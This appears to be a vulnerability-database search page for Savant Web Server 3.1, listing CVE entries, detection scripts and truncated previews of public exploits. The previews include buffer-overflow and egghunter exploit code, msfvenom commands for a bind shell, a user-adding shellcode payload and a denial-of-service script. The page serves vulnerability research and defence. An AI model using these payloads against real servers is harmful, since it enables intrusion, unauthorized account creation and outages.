107 matches found
EUVD-2002-0099
Malware in sbrugna...
EUVD-2000-0518
Malware in sbrugna...
EUVD-2005-2860
Malware in sbrugna...
EUVD-2000-0014
Malware in sbrugna...
EUVD-2001-0430
Malware in sbrugna...
EUVD-2002-2124
Malware in sbrugna...
EUVD-2002-2125
Malware in sbrugna...
CVE-2005-2859
Savant Web Server stores user credentials in plaintext in the Savant\Users registry key, which allows local users to gain privileges...
CVE-2002-2146
cgitest.exe in Savant Web Server 3.1 and earlier allows remote attackers to cause a denial of service crash via a long HTTP request...
CVE-2002-2145
Savant Web Server 3.1 and earlier allows remote attackers to bypass authentication for password protected user folders via a URL with a hex encoded space %20 and a '.' %2e at the end of the filename...
Savant Web Server 3.1 Remote Buffer Overflow
Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow Egghunter Date: 30/07/2023 Exploit Author: 0xBOF90 Vendor Homepage: link Version: app version 3.1 Tested on: Windows 10 import socket import sys try: server = b"192.168.56.102" \x00\x0a\x0d\x25 port = 80 size = 253 msfvenom -p...
Savant Web Server Denial of Service Vulnerability
Savant Web Server is a WEB server. A denial of service vulnerability exists in Savant Web Server. An attacker can exploit the vulnerability to launch a denial of service attack...
Savant Web Server Detection
Checks whether Savant Web Server is present on the target system and if so, tries to figure out the installed version. Copyright C 2019 Greenbone Networks GmbH SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can redistribute it and/or modify it under the terms of the...
Savant Web Server 3.1 - Remote Buffer OverflowExploit (win2003)
No description provided by source. !/usr/bin/perl D:\Documents and Settings\Administrator\Desktop\explo da uppare\provasavant.pl -h 127.0.0.1 -= Savant Web Server 3.1 Remote Buffer Overflow Exploit =- -= =- -= Coded by CorryL info:www.x0n3-h4ck.org =- + Connect to 127.0.0.1 + Using 00b7ead8 // Re...
Savant Web Server 3.1 Page Redirect Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8712/info Savant Web Server is prone to a denial of service vulnerability. The server reportedly goes into an infinite loop upon receipt of a specially crafted HTTP GET request that causes the server to repeatedly redirec...
Savant Web Server 3.1 - Remote Buffer Overflow Exploit
No description provided by source. Savant web server Buffer Overflow Exploit Discovered by : Mati Aharoni Coded by : Tal Zeltzer and Mati Aharoni www.see-security.com FOR RESEACRH PURPOSES ONLY! import struct import socket sc = \x90 21 win32adduser - PASS=pwd EXITFUNC=thread USER=X Size=232...
Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter)
No description provided by source. !/usr/bin/python import socket targetaddress=10.10.10.129 targetport=80 buffer2 = R0cX + R0cX msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e x86/shikataganai -c 4 -t c buffer2 += \xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1...
Savant Web Server 3.1 - Remote BoF (French Win OS support)
No description provided by source. Savant web server Buffer Overflow Exploit Discovered by : Mati Aharoni Coded by : Tal Zeltzer and Mati Aharoni www.see-security.com FOR RESEACRH PURPOSES ONLY! FRench Win OS support by Jerome Athias import struct import socket sc = \x90 21 We need this number of...
Savant Web Server Remote Buffer Overflow Vulnerability (Jan 2012) - Active Check
Savant Web Server is prone to a buffer overflow vulnerability. SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...
Savant Web Server 3.1 - Denial of-Service (PoC)
!/usr/bin/python import socket import sys from struct import pack try: server = sys.argv1 port = 80 size = 260 httpMethod = b"GET /" inputBuffer = b"\x41" size httpEndRequest = b"\r\n\r\n" buf = httpMethod + inputBuffer + httpEndRequest print"Sending evil buffer..." s = socket.socketsocket.AFINET...